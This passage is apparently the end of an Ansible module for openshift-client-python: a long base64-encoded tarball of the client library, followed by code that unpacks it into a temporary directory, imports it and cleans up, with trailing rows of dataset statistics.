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'
# Rehydrate the embedded openshift-client-python tarball (base64 blob injected
# by the rebuild step) into an in-memory file object.
OPENSHIFT_CLIENT_PYTHON_TGZ = six.BytesIO(base64.b64decode(REPLACED_BY_REBUILD_MODULE))

module = AnsibleModule(
    argument_spec=dict(
        script=dict(required=True),
        vars=dict(required=False, default={}, type='dict'),
        project=dict(required=False, default=None),
        timeout=dict(required=False, default=None, type='int'),
        changes=dict(required=False, default=False, type='bool')
    )
)

client_python_extract_dir = tempfile.mkdtemp()
module.debug('Extracting openshift-client-python module to: {}'.format(client_python_extract_dir))
try:
    # Use a context manager so the tarfile handle is closed even if
    # extraction fails; the original left the handle open.
    with tarfile.open(fileobj=OPENSHIFT_CLIENT_PYTHON_TGZ, mode='r:gz') as tf:
        tf.extractall(client_python_extract_dir)
    # Add the newly extracted directory to the python path to resolve the openshift package
    sys.path.append(client_python_extract_dir)
    # Import openshift as oc so that we can delete the extract directory. module.exit_ type methods
    # call sys.exit, so this is our only chance to leave no trace.
    import openshift as oc
    shutil.rmtree(client_python_extract_dir)
    main()
finally:
    # Best-effort cleanup in case an error occurred before the rmtree above ran.
    if os.path.exists(client_python_extract_dir):
        shutil.rmtree(client_python_extract_dir)
| 699.828571
| 69,131
| 0.948164
| 2,574
| 73,482
| 27.035354
| 0.842269
| 0.002759
| 0.002414
| 0.002529
| 0.009182
| 0.008133
| 0.007156
| 0.007156
| 0.00638
| 0.00638
| 0
| 0.151477
| 0.017147
| 73,482
| 104
| 69,132
| 706.557692
| 0.812066
| 0.010193
| 0
| 0.220779
| 1
| 0.012987
| 0.954704
| 0.951417
| 0
| 1
| 0
| 0
| 0
| 1
| 0.025974
| false
| 0
| 0.181818
| 0
| 0.207792
| 0.051948
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.